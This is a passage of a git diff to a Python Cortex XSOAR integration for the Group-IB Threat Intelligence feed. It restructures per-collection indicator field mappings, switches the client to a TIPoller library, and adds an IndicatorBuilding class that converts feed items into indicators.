"malware_list_names": "gibmalwarename", + }, + "indicators_params_url": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_hashes_md5": { + "id": "gibid", + "indicators_params_name": "gibfilename", + "indicators_params_hashes_md5": "md5", + "indicators_params_hashes_sha1": "sha1", + "indicators_params_hashes_sha256": "sha256", + "indicators_params_size": "size", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + }, + "parser_mapping": { + "id": "id", + "indicators_params_ipv4": "indicators.params.ipv4", + "indicators_params_domain": "indicators.params.domain", + "indicators_params_url": "indicators.params.url", + "indicators_params_hashes_md5": "indicators.params.hashes.md5", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "indicators_date_first_seen": "indicators.dateFirstSeen", + "indicators_date_last_seen": "indicators.dateLastSeen", + "indicators_params_name": "indicators.params.name", + "indicators_params_hashes_sha1": "indicators.params.hashes.sha1", + "indicators_params_hashes_sha256": "indicators.params.hashes.sha256", + "indicators_params_size": "indicators.params.size", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + "malware_list_names": "malwareList.name", + }, }, "hi/threat": { - "indicators": - [ - { - "main_field": 'indicators.params.ipv4', "main_field_type": 'IP', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.domain', "main_field_type": 'Domain', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.url', "main_field_type": 'URL', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.hashes.md5', "main_field_type": 'File', - "add_fields": [ - 'indicators.params.name', 'indicators.params.hashes.md5', 'indicators.params.hashes.sha1', - 'indicators.params.hashes.sha256', 'indicators.params.size', - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'gibfilename', 'md5', 'sha1', 'sha256', 'size', - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "indicators_params_ipv4": "IP", + "indicators_params_domain": "Domain", + "indicators_params_url": "URL", + "indicators_params_hashes_md5": "File", + }, + "add_fields_types": { + "indicators_params_ipv4": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_domain": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_url": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_hashes_md5": { + "id": "gibid", + "indicators_params_name": "gibfilename", + "indicators_params_hashes_md5": "md5", + "indicators_params_hashes_sha1": "sha1", + "indicators_params_hashes_sha256": "sha256", + "indicators_params_size": "size", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + }, + "parser_mapping": { + "id": "id", + "indicators_params_ipv4": "indicators.params.ipv4", + "indicators_params_domain": "indicators.params.domain", + "indicators_params_url": "indicators.params.url", + "indicators_params_hashes_md5": "indicators.params.hashes.md5", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "indicators_date_first_seen": "indicators.dateFirstSeen", + "indicators_date_last_seen": "indicators.dateLastSeen", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + "indicators_params_name": "indicators.params.name", + "indicators_params_hashes_sha1": "indicators.params.hashes.sha1", + "indicators_params_hashes_sha256": "indicators.params.hashes.sha256", + "indicators_params_size": "indicators.params.size", + "malware_list_names": "malwareList.name", + }, }, "suspicious_ip/tor_node": { - 'indicators': - [ - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', - 'dateFirstSeen', 'dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + "id": "id", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, }, "suspicious_ip/open_proxy": { - 'indicators': - [ - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'port', 'anonymous', 'source', - 'dateFirstSeen', 'dateDetected', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, 'gibproxyport', 'gibproxyanonymous', 'source', - 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "port": "gibproxyport", + "anonymous": "gibproxyanonymous", + "source": "source", + "date_first_seen": "firstseenbysource", + "date_detected": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + "id": "id", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "port": "port", + "anonymous": "anonymous", + "source": "source", + "date_first_seen": "dateFirstSeen", + "date_detected": "dateDetected", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, }, "suspicious_ip/socks_proxy": { - 'indicators': - [ - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'dateFirstSeen', - 'dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + "id": "id", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, + }, + "suspicious_ip/vpn": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + "id": "id", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, + }, + "suspicious_ip/scanner": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_countr_mame": "geocountry", + "ipv4_region": "geolocation", + }, + }, + "parser_mapping": { + "id": "id", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, }, "malware/cnc": { - 'indicators': - [ - { - 'main_field': 'url', "main_field_type": 'URL', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'dateDetected', 'dateLastSeen' - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource' - ] - }, - { - 'main_field': 'domain', "main_field_type": 'Domain', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'dateDetected', 'dateLastSeen' - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource' - ] - }, - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', - *THREAT_ACTOR_FIELDS, 'dateDetected', 'dateLastSeen' - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource' - ] - } - ] + "types": { + "url": "URL", + "domain": "Domain", + "ipv4_ip": "IP", + }, + "add_fields_types": { + "url": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "date_detected": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "malware_list_names": "gibmalwarename", + }, + "domain": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "date_detected": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "malware_list_names": "gibmalwarename", + }, + "ipv4_ip": { + "id": "gibid", + "ipv4_asn": "asn", + "ipv4_country_mame": "geocountry", + "ipv4_region": "geolocation", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "date_detected": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "malware_list_names": "gibmalwarename", + }, + }, + "parser_mapping": { + "id": "id", + "url": "url", + "domain": "domain", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_mame": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "date_detected": "dateDetected", + "date_last_seen": "dateLastSeen", + "malware_list_names": "malwareList.name", + }, }, "osi/vulnerability": { - 'indicators': - [ - { - 'main_field': 'id', "main_field_type": 'CVE', - "add_fields": [ - 'cvss.score', 'cvss.vector', 'softwareMixed', - 'description', 'dateModified', 'datePublished', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'cvss', 'gibcvssvector', 'gibsoftwaremixed', - 'cvedescription', 'cvemodified', 'published', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "id": "CVE", + }, + "add_fields_types": { + "id": { + "id": "gibid", + "cvss_score": "cvss", + "cvss_vector": "gibcvssvector", + "software_mixed": "gibsoftwaremixed", + "description": "cvedescription", + "date_modified": "cvemodified", + "date_published": "published", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "markdowns": { + "software_mixed": ( + "| Software Name | Software Type | Software Version |\n" + "| ------------- | ------------- | ---------------- |\n" + ) + }, + "parser_mapping": { + "id": "id", + "cvss_score": "cvss.score", + "cvss_vector": "cvss.vector", + "software_mixed": { + "names": "softwareMixed.softwareName", + "types": "softwareMixed.softwareType", + "versions": "softwareMixed.softwareVersion", + }, + "description": "description", + "date_modified": "dateModified", + "date_published": "datePublished", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, + }, + "osi/git_repository": { + "types": { + "contributors_emails": "Email", + "hash": "GIB Hash", + }, + "add_fields_types": { + "contributors_emails": { + "id": "gibid", + }, + "hash": { + "id": "gibid", + }, + }, + "parser_mapping": { + "id": "id", + "hash": "files.revisions.hash", + "contributors_emails": "contributors.authorEmail", + }, + }, + "ioc/common": { + "types": { + "url": "URL", + "domain": "Domain", + "ip": "IP", + }, + "add_fields_types": { + "url": { + "id": "gibid", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + }, + "domain": { + "id": "gibid", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + }, + "ip": { + "id": "gibid", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + }, + }, + "parser_mapping": { + "id": "id", + "url": "url", + "domain": "domain", + "ip": "ip", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + }, }, - 'ioc/common': { - 'indicators': - [ - { - 'main_field': 'url', "main_field_type": 'URL', - "add_fields": [ - 'dateFirstSeen', 'dateLastSeen', - - ], - "add_fields_types": [ - 'firstseenbysource', 'lastseenbysource', - - ] - }, - { - 'main_field': 'domain', "main_field_type": 'Domain', - "add_fields": [ - 'dateFirstSeen', 'dateLastSeen', - - ], - "add_fields_types": [ - 'firstseenbysource', 'lastseenbysource', - - ] - }, { - 'main_field': 'ip', "main_field_type": 'IP', - "add_fields": [ - 'dateFirstSeen', 'dateLastSeen', - - ], - "add_fields_types": [ - 'firstseenbysource', 'lastseenbysource', - - ] - } - ] - } } +COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES = [ + "osi/git_repository", + "osi/public_leak", + "compromised/breached", +] + class Client(BaseClient): """ @@ -483,92 +856,43 @@ class Client(BaseClient): Should only do requests and return data. """ - def create_update_generator(self, collection_name: str, date_from: str | None = None, - seq_update: int | str | None = None, limit: int = 200) -> Generator: - """ - Creates generator of lists with feeds class objects for an update session - (feeds are sorted in ascending order) `collection_name` with set parameters. - - `seq_update` allows you to receive all relevant feeds. Such a request uses the seq_update parameter, - you will receive a portion of feeds that starts with the next `seq_update` parameter for the current collection. - For all feeds in the Group IB Intelligence continuous numbering is carried out. - For example, the `seq_update` equal to 1999998 can be in the `compromised/accounts` collection, - and a feed with seq_update equal to 1999999 can be in the `attacks/ddos` collection. - If item updates (for example, if new attacks were associated with existing APT by our specialists - or tor node has been detected as active again), the item gets a new parameter and it automatically rises - in the database and "becomes relevant" again. - - :param collection_name: collection to update. - :param date_from: start date of update session. - :param seq_update: identification number from which to start the session. - :param limit: size of portion in iteration. - """ - - while True: - session = requests.Session() - session.auth = HTTPBasicAuth(self._auth[0], self._auth[1]) - - session.headers["Accept"] = "*/*" - session.headers["User-Agent"] = f'SOAR/CortexSOAR/{self._auth[0]}/unknown' - - params = {'df': date_from, 'limit': limit, 'seqUpdate': seq_update} - params = {key: value for key, value in params.items() if value} - portion = session.get(url=f'{self._base_url}{collection_name}/updated', params=params, timeout=60).json() - - # product = f'SOAR/CortexSOAR/Username/unkown}' - # portion = self._http_request(method="GET", url_suffix=collection_name + '/updated', - # params=params, timeout=60., - # retries=4, status_list_to_retry=[429, 500]) - if portion.get("count") == 0: - break - seq_update = portion.get("seqUpdate") - date_from = None - yield portion.get('items') - - def create_search_generator(self, collection_name: str, date_from: str = None, - limit: int = 200) -> Generator: - """ - Creates generator of lists with feeds for the search session - (feeds are sorted in descending order) for `collection_name` with set parameters. - - :param collection_name: collection to search. - :param date_from: start date of search session. - :param limit: size of portion in iteration. - """ - - result_id = None - while True: - session = requests.Session() - session.auth = HTTPBasicAuth(self._auth[0], self._auth[1]) - - session.headers["Accept"] = "*/*" - session.headers["User-Agent"] = f'SOAR/CortexSOAR/{self._auth[0]}/unknown' - - params = {'df': date_from, 'limit': limit, 'resultId': result_id} - params = {key: value for key, value in params.items() if value} - portion = session.get(url=f'{self._base_url}{collection_name}', params=params, timeout=60).json() - # params = {'df': date_from, 'limit': limit, 'resultId': result_id} - # params = {key: value for key, value in params.items() if value} - # portion = self._http_request(method="GET", url_suffix=collection_name, - # params=params, timeout=60., - # retries=4, status_list_to_retry=[429, 500]) - if len(portion.get('items')) == 0: - break - result_id = portion.get("resultId") - date_from = None - yield portion.get('items') - - def search_feed_by_id(self, collection_name: str, feed_id: str) -> dict: - """ - Searches for feed with `feed_id` in collection with `collection_name`. - - :param collection_name: in what collection to search. - :param feed_id: id of feed to search. - """ - - portion = self._http_request(method="GET", url_suffix=collection_name + '/' + feed_id, timeout=60., - retries=4, status_list_to_retry=[429, 500]) - return portion + def __init__(self, base_url, verify=True, proxy=False, headers=None, auth=None): + super().__init__( + base_url=base_url, verify=verify, proxy=proxy, headers=headers, auth=auth + ) + + self._auth: tuple[str, str] + self.poller = TIPoller( + username=self._auth[0], + api_key=self._auth[1], + api_url=base_url, + ) + self.poller.set_product( + product_type="SOAR", + product_name="CortexSOAR", + product_version="unknown", + integration_name="Group-IB Threat Intelligence", + integration_version="2.0.0", + ) + + def create_update_generator_proxy_functions( + self, + collection_name: str, + date_from: str | None = None, + sequpdate: int | str | None = None, + apply_hunting_rules: int | str | None = None, + limit: int | str | None = None, + ): + return self.poller.create_update_generator( + collection_name=collection_name, + date_from=date_from, + sequpdate=sequpdate, + apply_hunting_rules=apply_hunting_rules, + limit=limit, + ) + + def get_available_collections_proxy_function(self) -> list: + return self.poller.get_available_collections() def test_module(client: Client) -> str: @@ -578,190 +902,375 @@ def test_module(client: Client) -> str: :param client: GIB_TI&A_Feed client :return: 'ok' if test passed, anything else will fail the test. """ - - generator = client.create_update_generator(collection_name='compromised/mule', limit=10) - generator.__next__() - return 'ok' + test = client.get_available_collections_proxy_function() + if len(test) == 0: + return "There are no collections available" + return "ok" """ Support functions """ -def find_element_by_key(obj, key): - """ - Recursively finds element or elements in dict. - """ - - path = key.split(".", 1) - if len(path) == 1: - if isinstance(obj, list): - return [i.get(path[0]) for i in obj] - elif isinstance(obj, dict): - return obj.get(path[0]) - else: - return obj - else: - if isinstance(obj, list): - return [find_element_by_key(i.get(path[0]), path[1]) for i in obj] - elif isinstance(obj, dict): - return find_element_by_key(obj.get(path[0]), path[1]) +class IndicatorBuilding: + fields_list_for_parse = [ + "creationdate", + "firstseenbysource", + "lastseenbysource", + "gibdatecompromised", + ] + + def __init__( + self, + parsed_json: list[dict], + collection_name: str, + common_fields: dict, + collection_mapping: dict, + limit: int | None = None, + build_for_comand: bool = False, + ) -> None: + self.parsed_json = parsed_json + self.collection_name = collection_name + self.common_fields = common_fields + self.tags = common_fields.pop("tags", []) + self.limit = limit + self.collection_mapping = collection_mapping + self.build_for_comand = build_for_comand + + @staticmethod + def clean_data(data): + def clean_list(lst): + """Removes None, empty rows and empty lists from a list and unpacks nested lists.""" + cleaned = [] + for item in lst: + if isinstance(item, list): + cleaned.extend(clean_list(item)) + elif item not in (None, "", []): + cleaned.append(item) + return cleaned + + cleaned_data = [] + + for item in data: + cleaned_item = {} + for key, value in item.items(): + if isinstance(value, list): + cleaned_item[key] = clean_list(value) + else: + cleaned_item[key] = value + cleaned_data.append(cleaned_item) + + return cleaned_data + + @staticmethod + def invert_dict(data_dict: dict): + return {v: k for k, v in data_dict.items()} + + @staticmethod + def get_key_by_value(data_dict: dict, target_value: str): + inverted_dict = IndicatorBuilding.invert_dict(data_dict) + return inverted_dict.get(target_value) + + @staticmethod + def get_human_readable_feed( + indicators: list, type_: str, collection_name: str + ) -> str: + + headers = ["value", "type"] + + collection_data = COMMON_MAPPING.get(collection_name) + initial_type = IndicatorBuilding.get_key_by_value(collection_data["types"], type_) # type: ignore + additional_headers = collection_data["add_fields_types"].get(initial_type) # type: ignore + headers.extend(additional_headers.values()) + + return tableToMarkdown( + f"{type_} indicators", indicators, removeNull=True, headers=headers + ) + + @staticmethod + def transform_list_to_str(data: list[dict]) -> list[dict]: + def process_item(item): + if isinstance(item, dict): + for key, value in item.items(): + if isinstance(value, list): + item[key] = ", ".join(str(process_item(v)) for v in value) + else: + item[key] = process_item(value) + return item + + return [process_item(item) for item in data] + + @staticmethod + def sorting_indicators( + indicators: list[dict[str, Any]] + ) -> dict[str, list[dict[str, Any]]]: + sorted_indicators: dict[str, list[dict[str, Any]]] = {} + + for indicator in indicators: + raw_json = indicator.get("rawJSON", {}) + indicator_type = raw_json.get("type") + + if indicator_type == "CVE": + raw_json.pop("gibsoftwaremixed", None) + + sorted_indicators.setdefault(indicator_type, []).append(raw_json) + + return sorted_indicators + + def build_indicator_value_for_software_mixed(self, feed: dict) -> str: + markdowns = self.collection_mapping.get("markdowns", {}) + software_mixed_data = feed.get("software_mixed", {}) + + rows = markdowns.get("software_mixed", "") + num_rows = len(next(iter(software_mixed_data.values()))) + + if num_rows > 0: + for i in range(num_rows): + row = ( + " | " + + " | ".join( + software_mixed_data[key][i] for key in software_mixed_data + ) + + " \n" + ) + rows += row + + software_mixed = rows else: - return obj + software_mixed = "" + indicator_value = software_mixed + return indicator_value -def unpack_iocs_from_list(ioc): - # type: (Union[list, str]) -> list - """ - Recursively unpacks all IOCs in one list. - """ - unpacked = [] - if isinstance(ioc, list): - for i in ioc: - unpacked.extend(unpack_iocs_from_list(i)) - else: - unpacked.append(ioc) + def build_indicator_value_for_date_field( + self, feed: dict, indicator_type_name: str + ): + indicator_value = dateparser.parse(feed.get(indicator_type_name)) # type: ignore + if indicator_value is not None: + indicator_value = indicator_value.strftime(DATE_FORMAT) # type: ignore + return indicator_value - return list(unpacked) + def extract_single_value(self, value): + """ + Extracts a single non-empty value from a potentially nested list. + :param value: The value to process, which could be a single value or a list of values. + :return: A single non-empty value or None if no valid value exists. + """ + if isinstance(value, list): + for item in value: + # Recursively extract a value from nested lists + result = self.extract_single_value(item) + if result is not None and result != "": + return result + return None + else: + return value if value is not None and value != "" else None -def unpack_iocs(iocs, ioc_type, fields, fields_names, collection_name): - """ - Recursively ties together and transforms indicator data. - """ - unpacked = [] - if isinstance(iocs, list): - for i, ioc in enumerate(iocs): - buf_fields = [] - for field in fields: - if isinstance(field, list): - buf_fields.append(field[i]) - else: - buf_fields.append(field) - unpacked.extend(unpack_iocs(ioc, ioc_type, buf_fields, fields_names, collection_name)) + def find_iocs_in_feed(self, feed: dict) -> list: + """ + Finds IOCs in the feed and transforms them to the appropriate format to ingest them into Demisto. - else: - if iocs in ['255.255.255.255', '0.0.0.0', '', None]: - return unpacked - - # fields=unpack_iocs_from_list(fields) - fields_dict = {fields_names[i]: fields[i] for i in range(len(fields_names)) if fields[i] is not None} - - # Transforming one certain field into a markdown table - if ioc_type == "CVE" and len(fields_dict["gibsoftwaremixed"]) != 0: - soft_mixed = fields_dict.get("gibsoftwaremixed", {}) - buffer = '' - for chunk in soft_mixed: - software_name = ', '.join(chunk.get('softwareName')) - software_type = ', '.join(chunk.get('softwareType')) - software_version = ', '.join(chunk.get('softwareVersion')) - if len(software_name) != 0 or len(software_type) != 0 or len(software_version) != 0: - buffer += '| {} | {} | {} |\n'.format(software_name, software_type, - software_version.replace('||', ', ')) - if len(buffer) != 0: - buffer = "| Software Name | Software Type | Software Version |\n" \ - "| ------------- | ------------- | ---------------- |\n" + buffer - fields_dict["gibsoftwaremixed"] = buffer + :param feed: feed from GIB TI&A. + """ + indicators_types = self.collection_mapping.get("types", {}) + indicators_add_fields_types = self.collection_mapping.get( + "add_fields_types", {} + ) + + indicators = [] + + demisto.debug( + f"Starting to process find_iocs_in_feed feed: {feed}, collection: {self.collection_name}" + ) + + for indicator_type_name, indicator_type in indicators_types.items(): + add_fields = {} + demisto.debug( + f"Processing find_iocs_in_feed indicator type: {indicator_type_name}, corresponding type: {indicator_type}" + ) + + if indicator_type in self.fields_list_for_parse: + indicator_value = self.build_indicator_value_for_date_field( + feed=feed, indicator_type_name=indicator_type_name + ) + demisto.debug( + f"Extracted date field find_iocs_in_feed indicator value: {indicator_value}" + ) else: - del fields_dict["gibsoftwaremixed"] - - # Transforming into correct date format - for date_field in DATE_FIELDS_LIST: - if fields_dict.get(date_field): - previous_date = dateparser.parse(fields_dict.get(date_field, "")) - # previous_date = fields_dict.get(date_field, "") - - if previous_date: - fields_dict[date_field] = previous_date.strftime('%Y-%m-%dT%H:%M:%SZ') - # fields_dict[date_field] = convert_to_timestamp(previous_date) - fields_dict.update({'gibcollection': collection_name}) - - raw_json = {'value': iocs, 'type': ioc_type, **fields_dict} - unpacked.append({'value': iocs, 'type': ioc_type, 'rawJSON': raw_json, 'fields': fields_dict}) - - return unpacked + if indicator_type_name == "software_mixed": + indicator_value = self.build_indicator_value_for_software_mixed( + feed=feed + ) + demisto.debug( + f"Extracted software mixed find_iocs_in_feed indicator value: {indicator_value}" + ) + + elif indicator_type_name in indicators_add_fields_types: + # Retrieve the initial indicator value + indicator_value = feed.get(indicator_type_name) + demisto.debug( + f"Raw find_iocs_in_feed indicator value for {indicator_type_name}: {indicator_value}" + ) + + # If the value is a list, flatten it to get a single non-list value + indicator_value = self.extract_single_value(indicator_value) + demisto.debug( + f"Flattened find_iocs_in_feed indicator value: {indicator_value}" + ) + + # Now process additional fields + for ( + additional_field_name, + additional_field_type, + ) in indicators_add_fields_types.get( + indicator_type_name + ).items(): # noqa: E501 + additional_field_value = feed.get(additional_field_name) + + # Process additional_field_value similarly + additional_field_value = self.extract_single_value( + additional_field_value + ) + + demisto.debug( + f"Processed find_iocs_in_feed additional field '{additional_field_name}': {additional_field_value}" + ) + + # Only add to add_fields if additional_field_value is not None or empty + if ( + additional_field_value is not None + and additional_field_value != "" + ): + add_fields[additional_field_type] = additional_field_value + demisto.debug( + f"Added additional field find_iocs_in_feed '{additional_field_type}': {additional_field_value}" + ) + + add_fields.update( + { + "trafficlightprotocol": self.common_fields.get( + 